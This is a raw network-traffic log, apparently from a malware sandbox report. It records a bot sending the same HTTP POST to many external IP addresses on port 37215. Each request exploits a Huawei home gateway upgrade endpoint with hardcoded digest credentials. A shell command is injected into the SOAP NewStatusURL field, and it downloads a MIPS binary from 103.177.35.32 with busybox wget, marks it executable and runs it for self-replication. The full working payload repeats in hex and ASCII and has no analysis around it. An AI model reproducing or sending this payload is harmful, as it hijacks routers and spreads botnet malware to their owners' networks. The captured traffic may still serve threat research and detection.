                                                        May 28, 2024 08:59:13.563525915 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2212192.168.2.234035241.179.137.9237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.563525915 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2213192.168.2.233758441.200.231.3937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.563540936 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2214192.168.2.233446841.55.106.17637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.563565969 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2215192.168.2.234239041.3.106.20637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.563574076 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2216192.168.2.2345804157.182.94.4137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.563574076 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2217192.168.2.2351404197.104.118.6537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.575606108 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2218192.168.2.2347074157.34.170.19437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.575988054 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2219192.168.2.2345180113.242.28.137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.576092958 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2220192.168.2.2337178218.75.224.21537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.576098919 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2221192.168.2.2336958197.182.200.18937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.576100111 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
